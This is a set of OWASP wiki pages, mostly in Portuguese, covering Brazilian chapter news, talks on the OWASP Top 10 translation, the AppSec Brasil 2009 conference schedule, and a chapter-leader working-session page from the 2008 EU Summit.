Parte II - TOP10 2007 [http://www.owasp.org/images/7/75/OWASP_TOP10_PT-BR.ppt Apresentação] - [http://www.owasp.org/images/4/42/OWASP_TOP_10_2007_PT-BR.pdf Documento]

=== OWASP TOP 10 @ FATEC Sorocaba ===
No dia 07 de abril às 19:30, Gislaine Lirian Bueno irá apresentar o TOP 10 2007 na FATEC de Sorocaba para os estudantes do curso de Processamento de Dados. A apresentação é aberta ao público, portanto quem estiver pela região ou morar próximo poderá assistir ao evento.

Maiores informações: [http://www.fatecsorocaba.edu.br/contato/contato.asp FATEC Sorocaba]

=== OWASP TOP 10 @ FISL ===
O capítulo Brasil irá fazer uma apresentação no 9º Fórum Internacional de Software Livre - FISL - a ser realizado entre os dias 17 e 19 de abril de 2008. Nesta ocasião o TOP 10 2007, será apresentado pelos membros [mailto:deigratia33@gmail.com Marcos Aurélio Rodrigues] e [mailto:leonardocavallari@gmail.com Leonardo Cavallari].

As inscrições para o FISL podem ser realizadas no [http://fisl.softwarelivre.org/ site].
Grade do evento pode ser acessada em [http://fisl.softwarelivre.org/9.0/papers/pub/ http://fisl.softwarelivre.org/9.0/papers/pub/].

== Atividades ==
Estamos recrutando voluntários para participarem das seguintes atividades:
* Tradução de documentos
* Apresentação de palestras
Aos interessados em apresentar palestras ou que possam abrir espaço para alguém apresentar, preencha a tabela abaixo procurando manter os registros de acordo com as datas dos eventos:

{| class="wikitable"
|-
! Facilitador
! Apresentador
! Assunto
! Data
! Local
|-
| [mailto:thiagoalz@gmail.com Thiago Lechuga]
| [mailto:thiagoalz@gmail.com Thiago Lechuga]
| OWASP TOP 10
| Definir
| UNICAMP
|-
| [mailto:janotijr@yahoo.com.br Paulo Janoti]
| [Definir]
| OWASP TOP 10
| Definir (Maio)
| ISTCC-RJ- FAETEC
|-
| [mailto:gugdias@gmail.com Gustavo Dias]
| Definir
| OWASP TOP 10/*
| Definir
| UFSCAR
|-
|}

* Desenvolvimento de artigos para revistas e mídias de comunicação

Brazilian

2009-05-04T16:46:29Z

Wagner.elias: /* PHP Conference 2008 */

{{Chapter Template|chaptername=Brazilian|extra=The chapter leader is [mailto:wagner.elias@gmail.com Wagner Elias] |mailinglistsite=http://lists.owasp.org/mailman/listinfo/owasp-brazilian|emailarchives=http://lists.owasp.org/pipermail/owasp-brazilian}}

<paypal>Brazil</paypal>

== Novidades do Capítulo ==

=== AppSec Brazil 2009 ===

O Chapter Brazil do OWASP estará realizando o primeiro App Sec Brazil, este evento será apoiado pela Câmara de Deputados do Brasil e tem como seu principal líder e organizador Lucas Ferreira. Saiba mais sobre o evento [http://www.owasp.org/index.php/AppSec_Brasil_2009_(pt-br)/ aqui].

=== PHP Conference 2008 ===

O Chapter Brazil do OWASP estará no evento PHP Conference Brasil 08, com expectativa de atingir cerca de 1.000 profissionais participantes e será realizado no UNIFIEO, Universidade localizada no Município de Osasco, São Paulo.

O nosso Chapter Leader, Wagner Elias, irá apresentar a palestra “Tratando as vulnerabilidades do Top 10 da OWASP”, no dia 28/11 das 9h00 às 10h30 na sala AT2 - Amarelo. Além disso, ele irá representar o Chapter Brazil do OWASP na solenidade de abertura do evento, que irá ocorrer no dia 29/11. Saiba mais sobre o evento [http://phpconf.com.br/ aqui].

=== OWASP EU Summit 2008 ===

Caros,

O OWASP EU Summit 2008 será apresentado em Portugal entre os dias 3 e 7 de novembro de 2008, e como responsável pela formação da grade de treinamentos, gostaria de convidar os interessados em ministrar cursos de IT Security a entrarem em contato comigo para maiores detalhes.

Todos os cursos deverão ser apresentados em inglês, são remunerados e incluem a participação do instrutor nas demais seções do EU Summit.

Informações sobre o evento estão disponíveis em: https://www.owasp.org/index.php/OWASP_EU_Summit_2008.

Atenciosamente,

'''Eduardo Vianna de Camargo Neves, CISSP'''

Conviso IT Security, Operations Manager

T. 55 (41) 3075.3080 | M. 55 (41) 9941.0825

eneves (at) conviso.com.br

=== SoC 2008 - Projetos Aprovados ===

Duas propostas submetidas por membros do capítulo foram aprovadas na temporada [[OWASP Summer of Code 2008]]. São elas:

'''[[:Category:OWASP Positive Security Project|Positive Security Project]] - por Eduardo Camargo Neves''': modificar a perspectiva adotada pelas empresas ao se tratar de aplicações por uma abordagem positiva.

'''[[OWASP ASDR Project]] - por [mailto:leonardocavallari(at)gmail.com Leonardo Cavallari]''': visa criar o guia de referência mais completo sobre segurança em aplicações Web, incluindo [[ASDR TOC Principles|Princípios]],[[ASDR TOC Threat Agents|Agentes de ameaças]], [[ASDR TOC Vulnerabilities|Vulnerabilidades]], [[ASDR TOC Attacks|Ataques]], [[ASDR TOC Control|Controles]], [[ASDR TOC Technical Impacts|Impactos Técnicos]] e de [[ASDR TOC Business Impacts|Negócio]].

Estamos precisando de voluntários! Entre em contato com os líderes dos projetos para saber como contribuir!!

=== Tradução da ferramenta WebGoat ===
O [[OWASP WebGoat Project|WebGoat]], projeto mantido pela OWASP é uma aplicação J2EE elaborada com diversas falhas propositais para ser utilizada como ferramenta de apresendizado.
[http://softwareseguro.blogspot.com Fabrício Braz] realizou a tradução da ferramenta possibilitando melhor entendimento das lições oferecidas.

Faça o download da versão em português [http://code.google.com/p/webgoat-ptbr/downloads/list aqui].

=== Tradução OWASP TOP10 ===
O Capítulo Brasil, por meio de seus voluntários, concluiu a tradução do OWASP TOP 10 2007, documento que reúne as 10 vulnerabilidades mais críticas em aplicações WEB. [http://www.owasp.org/images/4/42/OWASP_TOP_10_2007_PT-BR.pdf Acesse o documento] e já comece a validar suas aplicações!

Agradeço o comprometimento de todos envolvidos no projeto: [mailto:clebber@gmail.com Cleber Brandão “Clebeer”], [mailto:fabricio.braz@gmail.com Fabricio Ataides Braz], [mailto:deigratia33@gmail.com Marcos Aurélio Rodrigues], [mailto:mykesh@gmail.com Myke Hamada], [mailto:spooker@gmail.com Rodrigo Montoro “Sp0oKer”].

[mailto:leonardocavallari@gmail.com Leonardo Cavallari] - Organizador e Responsável pela tradução

== Eventos ==
=== Apresentação sobre o OWASP e projeto TOP 10 @ ISSA Day - Capítulo Brasil/SP ===
Introdução sobre o projeto OWASP e TOP10 apresentado aos participantes do ISSA Day/Brasil em Junho/2008, por Leonardo Cavallari.

Download das apresentações pode ser feito nos links abaixo:

Parte I - [http://www.owasp.org/images/b/b4/OWASP-Intro-2008-pt-br.ppt Introdução OWASP]

Parte II - TOP10 2007 [http://www.owasp.org/images/7/75/OWASP_TOP10_PT-BR.ppt Apresentação] - [http://www.owasp.org/images/4/42/OWASP_TOP_10_2007_PT-BR.pdf Documento]

=== OWASP TOP 10 @ FATEC Sorocaba ===
No dia 07 de abril às 19:30, Gislaine Lirian Bueno irá apresentar o TOP 10 2007 na FATEC de Sorocaba para os estudantes do curso de Processamento de Dados. A apresentação é aberta ao público, portanto quem estiver pela região ou morar próximo poderá assistir ao evento.

Maiores informações: [http://www.fatecsorocaba.edu.br/contato/contato.asp FATEC Sorocaba]

=== OWASP TOP 10 @ FISL ===
O capítulo Brasil irá fazer uma apresentação no 9º Fórum Internacional de Software Livre - FISL - a ser realizado entre os dias 17 e 19 de abril de 2008. Nesta ocasião o TOP 10 2007, será apresentado pelos membros [mailto:deigratia33@gmail.com Marcos Aurélio Rodrigues] e [mailto:leonardocavallari@gmail.com Leonardo Cavallari].

As inscrições para o FISL podem ser realizadas no [http://fisl.softwarelivre.org/ site].
Grade do evento pode ser acessada em [http://fisl.softwarelivre.org/9.0/papers/pub/ http://fisl.softwarelivre.org/9.0/papers/pub/].

== Atividades ==
Estamos recrutando voluntários para participarem das seguintes atividades:
* Tradução de documentos
* Apresentação de palestras
Aos interessados em apresentar palestras ou que possam abrir espaço para alguém apresentar, preencha a tabela abaixo procurando manter os registros de acordo com as datas dos eventos:

{| class="wikitable"
|-
! Facilitador
! Apresentador
! Assunto
! Data
! Local
|-
| [mailto:thiagoalz@gmail.com Thiago Lechuga]
| [mailto:thiagoalz@gmail.com Thiago Lechuga]
| OWASP TOP 10
| Definir
| UNICAMP
|-
| [mailto:janotijr@yahoo.com.br Paulo Janoti]
| [Definir]
| OWASP TOP 10
| Definir (Maio)
| ISTCC-RJ- FAETEC
|-
| [mailto:gugdias@gmail.com Gustavo Dias]
| Definir
| OWASP TOP 10/*
| Definir
| UFSCAR
|-
|}

* Desenvolvimento de artigos para revistas e mídias de comunicação

AppSec Brasil 2009 (pt-br)

2009-05-04T16:42:39Z

Wagner.elias: /* Comitês */

Seja bem vindo à Conferência de Segurança de Aplicações do OWASP para o Brasil! Depois de conferências bem sucedidas nos Estados Unidos e na Europa, estaremos no Brasil em outubro de 2009!

[[Image:Brasilia Panorama.jpg]]

Em outubro, o OWASP fará a primeira Conferência de Segurança de Aplicações no Brasil em [http://en.wikipedia.org/wiki/Brasília Brasília], capital do Brasil. A conferência consistirá de dois dias de treinamentos, seguidos de dois dias de conferência em trilha única.

==Local==

'''Brasília, DF, Brasil.'''

==Chamada de Trabalhos==

A definir.

==Chamada de Treinamentos==

A definir.

==Agenda e Apresentações ==

===Programa da Conferência - Dia 1 - 29 de outubro de 2009 ===

<center>
<table width="80%" class="t">
<tr>
<td width="7%" class="tcell3" valign="top"><div align="right">08:30</div></td>
<td colspan="2" bgcolor="#8595C2" class="tcell3"><center>
<strong> Recepção </strong>
</center></td>
</tr>
<tr>

<td class="tcell2" valign="top"><div align="right">09:00</div></td>
<td colspan="2" bgcolor="#eeeeee" class="tcell"><div align="center"><b>Abertura</b></div></td>
</tr>
<tr>
<td class="tcell2" valign="top"><div align="right">09:20</div></td>
<td colspan="2" bgcolor="#b9c2dc" class="tcell" align="center"><b>keynote</b><br/>
tba</td>
</tr>

<tr>
<td class="tcell2" valign="top"><div align="right">11:00</div></td>
<td colspan="2" bgcolor="#D98B66" class="tcell"><div align="center"><strong>Intervalo</strong></div></td>
</tr>
<tr>
<td class="tcell2" valign="top"><div align="right">11:15</div></td>
<td colspan="2" bgcolor="#B9C2DC" class="tcell"><strong>tba</strong><br />
tba</td>
</tr>
<tr>
<td class="tcell3" valign="top"><div align="right">12:00</div></td>
<td colspan="2" bgcolor="#D98B66" class="tcell3"><div align="center"><strong>Almoço</strong></div></td>
</tr>
<tr>
<td class="tcell2" valign="top"><div align="right">13:30</div></td>
<td colspan="2" bgcolor="#EEEEEE" class="tcell"><b>tba</b><br/>
tba</td>
</tr>
<tr>
<td class="tcell2" valign="top"><div align="right">14:20</div></td>
<td colspan="2" bgcolor="#B9C2DC" class="tcell"><b>tba</b><br/>
tba</td>

</tr>
<tr>

<tr>
<td class="tcell3" valign="top"><div align="right">15:10</div></td>
<td colspan="2" bgcolor="#D98B66" class="tcell3"><div align="center"><strong>Intervalo</strong></div></td>
</tr>
<tr>
<td class="tcell2" valign="top"><div align="right">15:30</div></td>
<td colspan="2" bgcolor="#B9C2DC" class="tcell"><b>tba</b><br/>
tba</td>

</tr>
<tr>
<td class="tcell2" valign="top"><div align="right">16:20</div></td>
<td colspan="2" bgcolor="#EEEEEE" class="tcell"><b>tba</b><br/>
tba</td>

</tr>
<tr>
<td class="tcell2" valign="top"><div align="right">17:10</div></td>
<td colspan="2" bgcolor="#B9C2DC" class="tcell"><strong>tba</strong><br />
tba</td>

</tr>
<tr>
<td class="tcell3" valign="top"><div align="right">18:00</div></td>
<td colspan="2" bgcolor="#CCCCCC" class="tcell3"><div align="center"><strong>Encerramento do primeiro dia</strong></div></td>
</tr>
</table>
</center>

===Programa da Conferência - Dia 2 - 30 de outubro de 2009===

<center>
<table width="80%" class="t">
<tr>
<td width="7%" class="tcell3" valign="top"><div align="right">08:30</div></td>
<td colspan="2" bgcolor="#8595C2" class="tcell3"><center>
<strong> Recepção </strong>
</center></td>
</tr>
<tr>

<td class="tcell2" valign="top"><div align="right">09:00</div></td>
<td colspan="2" bgcolor="#eeeeee" class="tcell"><div align="center"><b>Abertura do segundo dia</b></div></td>
</tr>
<tr>
<td class="tcell2" valign="top"><div align="right">09:10</div></td>
<td colspan="2" bgcolor="#b9c2dc" class="tcell" align="center"><b>keynote</b><br/>
tba</td>
</tr>

<tr>
<td class="tcell2" valign="top"><div align="right">10:40</div></td>
<td colspan="2" bgcolor="#D98B66" class="tcell"><div align="center"><strong>Intervalo</strong></div></td>
</tr>
<tr>
<td class="tcell2" valign="top"><div align="right">11:00</div></td>
<td colspan="2" bgcolor="#B9C2DC" class="tcell"><strong>tba</strong><br />
tba</td>
</tr>
<tr>
<td class="tcell3" valign="top"><div align="right">12:00</div></td>
<td colspan="2" bgcolor="#D98B66" class="tcell3"><div align="center"><strong>Almoço</strong></div></td>
</tr>
<tr>
<td class="tcell2" valign="top"><div align="right">13:30</div></td>
<td colspan="2" bgcolor="#EEEEEE" class="tcell"><b>tba</b><br/>
tba</td>
</tr>
<tr>
<td class="tcell2" valign="top"><div align="right">14:20</div></td>
<td colspan="2" bgcolor="#B9C2DC" class="tcell"><b>tba</b><br/>
tba</td>

</tr>
<tr>

<tr>
<td class="tcell3" valign="top"><div align="right">15:10</div></td>
<td colspan="2" bgcolor="#D98B66" class="tcell3"><div align="center"><strong>Intervalo</strong></div></td>
</tr>
<tr>
<td class="tcell2" valign="top"><div align="right">15:30</div></td>
<td colspan="2" bgcolor="#B9C2DC" class="tcell"><b>tba</b><br/>
tba</td>

</tr>
<tr>
<td class="tcell2" valign="top"><div align="right">16:20</div></td>
<td colspan="2" bgcolor="#EEEEEE" class="tcell"><b>tba</b><br/>
tba</td>

</tr>
<tr>
<td class="tcell2" valign="top"><div align="right">17:10</div></td>
<td colspan="2" bgcolor="#B9C2DC" class="tcell"><strong>tba</strong><br />
tba</td>

</tr>
<tr>
<td class="tcell3" valign="top"><div align="right">18:00</div></td>
<td colspan="2" bgcolor="#CCCCCC" class="tcell3"><div align="center"><strong>Encerramento</strong></div></td>
</tr>
</table>
</center>

==Local do evento==

[[Image:CongressoNacional.jpg|The Palácio do Congresso building]]

O evento será em Brasília, DF, Brasil no endereço: Auditório Nereu Ramos, Câmara dos Deputados - Anexo II, Praça dos Três Poderes.

Veja a localização no [http://maps.google.com/maps?f=q&source=s_q&hl=pt-BR&geocode=&q=anexo+II,+camara+dos+deputados,+brasilia&sll=37.0625,-95.677068&sspn=43.934478,79.101563&ie=UTF8&t=h&ll=-15.800058,-47.865822&spn=0.01309,0.019312&z=16 Google Maps]

==Treinamentos - 27 e 28 de outubro==

O OWASP oferecerá vários tutoriais de 1 ou 2 dias de duração nos dias anteriores à conferência. Se você estiver interessado em ministrar um tutorial, por favor entre em contato com [mailto:eduardo.neves@owasp.org Eduardo Neves].

==Hospedagem==

A definir.

==Transporte para a Conferência==

A definir

===Como chegar ao local da Conferência===

A definir

==Inscrições e Custos==

A Conferência será gratuita, mas será necessário inscrever-se previamente. O procedimento de inscrição será definido oportunamente.

==Comitês==

OWASP Conferences Chair: Dave Wichers - Aspect Security - dave.wichers 'at' owasp.org

2009 AppSec CPLP - Comitê de Programa:
* Coordenador Geral: Lucas C. Ferreira (contato at sapao.net)
* Coordenador de Tutoriais: Eduardo V. C. Neves (eduardo.neves at owasp.org)
* Coordenador do Programa: Wagner Elias (wagner.elias at owasp.org)

Equipe Organizadora pré-evento

* Cassio Goldschmidt (cassio 'at' owasp.org)
* Kuai Hinojosa (kuai.hinojosa 'at' owasp.org)
* Leonardo Cavallari - (email)
* Thiago Lechuga (thiagoalz 'at' gmail.com)

Equipe Organizadora durante o evento

==[[OWASP AppSec Conference Sponsors | Apoios]]==

Esta conferência tem o apoio da Comunidade [http://www.ticontrole.gov.br TI-Controle] e do Centro de Informática da [http://www.camara.gov.br/ Câmara dos Deputados]

[[Category:OWASP AppSec Conference]]

Best Practices for OWASP Chapter Leaders

2008-10-23T01:06:35Z

Wagner.elias: /* Working Session Participants */

{| style="width:100%" border="0" align="center"
! colspan="7" align="center" style="background:#b3b3b3; color:white"|<font color="black">'''Working Sessions Operational Rules''' - [[:Working Sessions Methodology|'''Please see here the general frame of rules''']].
|}
{| style="width:100%" border="0" align="center"
! colspan="7" align="center" style="background:#4058A0; color:white"|<font color="white">'''WORKING SESSION IDENTIFICATION'''
|-
| style="width:15%; background:#7B8ABD" align="center"|'''Work Session Name'''
| colspan="6" style="width:85%; background:#cccccc" align="left"|<font color="black">'''Best Practices for OWASP Chapter Leaders'''
|-
| style="width:15%; background:#7B8ABD" align="center"| '''Short Work Session Description'''
| colspan="6" style="width:85%; background:#cccccc" align="left"|The aim of the Workshop is to identify existing material, prepare some ideas and compile a "Chapter Best Practices Guideline" together after the Summit.
|-
| style="width:15%; background:#7B8ABD" align="center"| '''Related Projects (if any)'''
| colspan="6" style="width:85%; background:#cccccc" align="left"|[[:Category:OWASP_Chapter|OWASP Chapters]]
|-
| style="width:25%; background:#7B8ABD" align="center"|'''Email Contacts & Roles'''
| style="width:25%; background:#cccccc" align="center"|'''Chair'''<br>[mailto:georg.hess(at)artofdefence.com '''Georg Heß''']
| style="width:25%; background:#cccccc" align="center"|'''Secretary'''<br>[mailto:seba(at)owasp.org '''Sebastien Deleersnyder''']
| style="width:25%; background:#cccccc" align="center"|'''Mailing list'''<br>[https://lists.owasp.org/mailman/listinfo/owasp-leaders '''Subscription Page''']
|}
{| style="width:100%" border="0" align="center"
! colspan="7" align="center" style="background:#4058A0; color:white"|<font color="white">'''WORKING SESSION SPECIFICS'''
|-
| style="width:15%; background:#7B8ABD" align="center"|'''Objectives'''
| colspan="6" style="width:85%; background:#cccccc" align="left"|<font color="black">
You´ve already started a local Chapter and know the Chapter rules "by heart". However, you most certainly have questions about growing, financing and "local" vs. "board" decision-making processes... The aim of the Workshop is to identify existing material, prepare some ideas and compile a "Chapter Best Practices Guideline" together after the Summit. Typical challenges are:
* Money: Where can I get funds from for growing my chapter - e.g. marketing efforts, organisational costs, etc... e.g. OWASP membership fees of local members/portions of it to be credited to the local chapter
* "Local" decisions: What can the local chapter decide upon e.g. "local PR messages (non English), (local) projects (perhaps as a start of international projects) - using professional help for setting up conferences etc.
* covering costs for "reasonable" translation efforts..
* Creating a local "OWASP Foundation" non-profit organisation vs. working as part of the global "OWASP Foundation"
* Best practices building "local boards" etc.
|-
| style="width:25%; background:#7B8ABD" align="center"|'''Venue/Date&Time/Model'''
| style="width:25%; background:#cccccc" align="center"|'''Venue'''<br>[[:OWASP EU Summit 2008|OWASP EU Summit Portugal 2008]]
| style="width:25%; background:#cccccc" align="center"|'''Date&Time'''<br>November 5 & 7, 2008<br>Time TBD
| style="width:25%; background:#cccccc" align="center"|'''Discussion Model'''<br>"Participants + Attendees"
|}
{| style="width:100%" border="0" align="center"
! colspan="7" align="center" style="background:white; color:white"|<font color="black">
|}

{|style="width:100%" border="0" align="center"
! colspan="7" align="center" style="background:#4058A0; color:white"|<font color="white">'''WORKING SESSION OPERATIONAL RESOURCES'''
|-
| style="width:100%; background:#cccccc" align="center"|Please add here, ASAP, any needed relevant resources, e.g. data-show, boards, laptops, etc.
|}
{| style="width:100%" border="0" align="center"
! colspan="7" align="center" style="background:white; color:white"|<font color="black">
|}
{| style="width:100%" border="0" align="center"
! colspan="7" align="center" style="background:#4058A0; color:white"|<font color="white">'''WORKING SESSION ADDITIONAL DETAILS'''
|-
| style="width:100%; background:#cccccc" align="center"|Please add here, any additional notes, links, ideas, guidelines, etc... The objective is to help the working sessions participants and attendees to prepare their participation/contribution
|}
{| style="width:100%" border="0" align="center"
! colspan="3" align="center" style="background:#4058A0; color:white"|'''WORKING SESSION OUTCOMES'''
|-
| style="width:7%; background:#6C82B5" align="center"|Statements, Initiatives or Decisions
| style="width:46%; background:#b3b3b3" align="center"|'''Proposed by Working Group'''
| style="width:47%; background:#b3b3b3" align="center"|'''Approved by OWASP Board'''
|-
| style="width:7%; background:#7B8ABD" align="center"|
| style="width:46%; background:#C2C2C2" align="center"|Best Practices for OWASP Chapter Leaders.
| style="width:47%; background:#C2C2C2" align="center"|After the Board Meeting - fill in here.
|-
| style="width:7%; background:#7B8ABD" align="center"|
| style="width:46%; background:#C2C2C2" align="center"|Fill in here.
| style="width:47%; background:#C2C2C2" align="center"|After the Board Meeting - fill in here.
|-
| style="width:7%; background:#7B8ABD" align="center"|
| style="width:46%; background:#C2C2C2" align="center"|Fill in here.
| style="width:47%; background:#C2C2C2" align="center"|After the Board Meeting - fill in here.
|}
== Working Session Participants ==
(Add you name by editing this table. On your the right, just above the this frame, you have the option to edit)
{| style="width:100%" border="0" align="center"
! colspan="7" align="center" style="background:#4058A0; color:white"|<font color="white">'''WORKING SESSION PARTICIPANTS'''
|-
| style="width:7%; background:#7B8ABD" align="center"|
| style="width:15%; background:#cccccc" align="center"|'''Name'''
| style="width:15%; background:#cccccc" align="center"|'''Company'''
| style="width:63%; background:#cccccc" align="center"|'''Notes & reason for participating, issues to be discussed/addressed'''
|-
| style="width:7%; background:#7B8ABD" align="center"|1
| style="width:15%; background:#cccccc" align="center"| Tom Brennan
| style="width:15%; background:#cccccc" align="center"|
| style="width:63%; background:#cccccc" align="center"|
|-
| style="width:7%; background:#7B8ABD" align="center"|2
| style="width:15%; background:#cccccc" align="center"| Wayne Huang
| style="width:15%; background:#cccccc" align="center"|
| style="width:63%; background:#cccccc" align="center"|
|-
| style="width:7%; background:#7B8ABD" align="center"|3
| style="width:15%; background:#cccccc" align="center"|Andrzej Targosz
| style="width:15%; background:#cccccc" align="center"|OWASP Poland
| style="width:63%; background:#cccccc" align="center"|
|-
| style="width:7%; background:#7B8ABD" align="center"|4
| style="width:15%; background:#cccccc" align="center"|David Campbell
| style="width:15%; background:#cccccc" align="center"|OWASP Denver
| style="width:63%; background:#cccccc" align="center"|
|-
| style="width:7%; background:#7B8ABD" align="center"|5
| style="width:15%; background:#cccccc" align="center"|Carlos Serrao
| style="width:15%; background:#cccccc" align="center"|ISCTE/Adetti, OWASP Portugal
| style="width:63%; background:#cccccc" align="center"|Leader of the OWASP Portugal
|-
| style="width:7%; background:#7B8ABD" align="center"|6
| style="width:15%; background:#cccccc" align="center"|Joaquim Marques
| style="width:15%; background:#cccccc" align="center"|IPCB/EST, OWASP Portugal
| style="width:63%; background:#cccccc" align="center"|Member of OWASP Portugal
|-
| style="width:7%; background:#7B8ABD" align="center"|7
| style="width:15%; background:#cccccc" align="center"|Pavol Luptak
| style="width:15%; background:#cccccc" align="center"|Nethemba s.r.o., OWASP Slovakia
| style="width:63%; background:#cccccc" align="center"|Leader of the OWASP Slovakia
|-
| style="width:7%; background:#7B8ABD" align="center"|8
| style="width:15%; background:#cccccc" align="center"|Leonardo Cavallari Militelli
| style="width:15%; background:#cccccc" align="center"|E-VAL Tecnologia
| style="width:63%; background:#cccccc" align="center"|OWASP Brasil - most active contributor
|-
| style="width:7%; background:#7B8ABD" align="center"|9
| style="width:15%; background:#cccccc" align="center"|Wagner Elias
| style="width:15%; background:#cccccc" align="center"|Conviso IT Security
| style="width:63%; background:#cccccc" align="center"|OWASP Brazil Chapter Lead
|-
| style="width:7%; background:#7B8ABD" align="center"|10
| style="width:15%; background:#cccccc" align="center"|
| style="width:15%; background:#cccccc" align="center"|
| style="width:63%; background:#cccccc" align="center"|
|}
If needed add here more lines.

[[Category:OWASP_Working_Session]]